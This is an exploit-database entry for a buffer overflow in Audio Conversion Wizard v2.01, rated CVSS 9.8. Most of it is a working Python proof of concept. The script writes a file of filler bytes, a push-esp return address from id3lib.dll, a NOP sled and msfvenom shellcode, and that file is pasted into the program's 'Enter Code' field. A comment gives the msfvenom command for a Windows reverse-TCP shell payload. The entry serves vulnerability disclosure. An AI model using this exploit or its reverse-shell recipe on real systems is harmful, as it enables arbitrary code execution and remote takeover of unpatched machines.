Audio Conversion Wizard v2.01 - Buffer Overflow

vendor:

Audio Conversion Wizard

by:

Hejap Zairy

9.8

CVSS

CRITICAL

Buffer Overflow

119

CWE

Product Name: Audio Conversion Wizard

Affected Version From: v2.01

Affected Version To: v2.01

Patch Exists: YES

Related CWE:

CPE: a:litexmedia:audio_conversion_wizard

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 64bit

2022

Audio Conversion Wizard v2.01 – Buffer Overflow

Audio Conversion Wizard v2.01 is vulnerable to a buffer overflow vulnerability. An attacker can exploit this vulnerability by running a python code to generate a malicious file, copying the content of the malicious file to the clipboard, opening Audio Conversion Wizard and pasting the content of the malicious file into the 'Enter Code' field, and clicking 'OK'. This will lead to arbitrary code execution.

Mitigation:

Update to the latest version of Audio Conversion Wizard.

Source

Exploit-DB raw data:

# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow 
# Exploit Author: Hejap Zairy
# Date: 03.07.2022
# Software Link:   https://www.litexmedia.com/acwizard.exe
# Tested Version: v2.01
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author  Code By Hejap Zairy
#!/usr/bin/env python

from pwn import *

buffer = "\x41" * 1016 
push_esp  =  p32(0x1004dbff) #push esp ret ret from  id3lib.dll
nops =  "\x90" * 15#515 tshhh theardlooo love Malware 
#msfvenom   --arch x64  windows/x64/shell_reverse_tcp  lhost=ip lport=443      -f python -e x64/shikata_ga_nai  -b "\x00\x0a\x0d\x20"  
#msfvenom  --arch x64  -p windows/x64/messagebox   TEXT="0day Hejap Zairy"  -f python -e x64/shikata_ga_nai  EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf =  b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer  + push_esp + nops + buf + padding
try:
    with open("0day_Hejap.txt","wb") as f:
        print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
        f.write(payload)
        f.close()
        print("[+] File created!")
except:
    print("[-]File cannot be created")